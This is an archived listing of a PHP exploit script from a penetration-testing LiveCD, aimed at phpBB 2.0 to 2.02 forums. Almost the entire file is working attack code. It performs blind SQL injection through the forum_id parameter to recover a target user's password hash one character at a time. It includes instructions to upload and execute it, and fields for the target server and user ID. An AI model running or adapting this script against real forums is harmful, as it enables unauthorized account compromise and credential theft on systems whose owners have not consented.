home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / phpbb / PHPBBAutoSelectFishAttacker.php < prev    next >
PHP Script  |  2005-02-12  |  2KB  |  73 lines
  1. <?php
  2.  
  3. ########## PHPBB 2.0,2.01,2.02 Auto-SelectFish Attacker
  4. ########## David@cgishield.com
  5.  
  6.  
  7. // To use this program, simply upload it to a php enabled webserver, and execute
  8. // If php times out before the whole password hash is determined, 
  9. // adjust the maximum script execution time in php.ini
  10. // Also, replace following with correct values:
  11.  
  12. $server="192.168.1.100";
  13. $script="/phpbb2/index.php";
  14. $the_userid_to_hack="2";
  15.  
  16.  
  17. // don't change this
  18. $data_to_match="In total there are <b>0</b> users online";
  19.  
  20. $checkchar[0]="char(48)";
  21. $checkchar[1]="char(49)";
  22. $checkchar[2]="char(50)";
  23. $checkchar[3]="char(51)";
  24. $checkchar[4]="char(52)";
  25. $checkchar[5]="char(53)";
  26. $checkchar[6]="char(54)";
  27. $checkchar[7]="char(55)";
  28. $checkchar[8]="char(56)";
  29. $checkchar[9]="char(57)";
  30. $checkchar[a]="char(97)";
  31. $checkchar[b]="char(98)";
  32. $checkchar[c]="char(99)";
  33. $checkchar[d]="char(100)";
  34. $checkchar[e]="char(101)";
  35. $checkchar[f]="char(102)";
  36.  
  37. for($i=1;$i<33;$i++){
  38. reset($checkchar);
  39. while (list($i2, $i2val) = @each($checkchar)){
  40. $vars="forum_id=1+or+user_id=$the_userid_to_hack+and+mid(user_password,$i,1)=$checkchar[$i2]/*";
  41. $data=sendToHost("$server",'post',"$script","$vars");
  42. if (eregi("$data_to_match","$data")){
  43. //echo("<b>$i2</b>");
  44. }
  45. else{echo("<br>$i= $i2"); flush();break;}
  46. }
  47. }
  48.  
  49.  
  50. function sendToHost($host,$method,$path,$data,$useragent=1)
  51. {
  52. $method = strtoupper($method);
  53. $fp = fsockopen($host,80);
  54. fputs($fp, "$method $path HTTP/1.1\n");
  55. fputs($fp, "Host: $host\n");
  56. fputs($fp, "Content-type: application/x-www-form-urlencoded\n");
  57. fputs($fp, "Content-length: " . strlen($data) . "\n");
  58. if ($useragent)
  59. fputs($fp, "User-Agent: Mozilla\n");
  60. fputs($fp, "Connection: close\n\n");
  61. if ($method == 'POST')
  62. fputs($fp, $data);
  63. while (!feof($fp))
  64. $buf .= fgets($fp,128);
  65. fclose($fp);
  66. for($slow=0;$slow<100;$slow++){}
  67.  
  68. return $buf;
  69. }
  70.  
  71. ?>
  72.  
  73.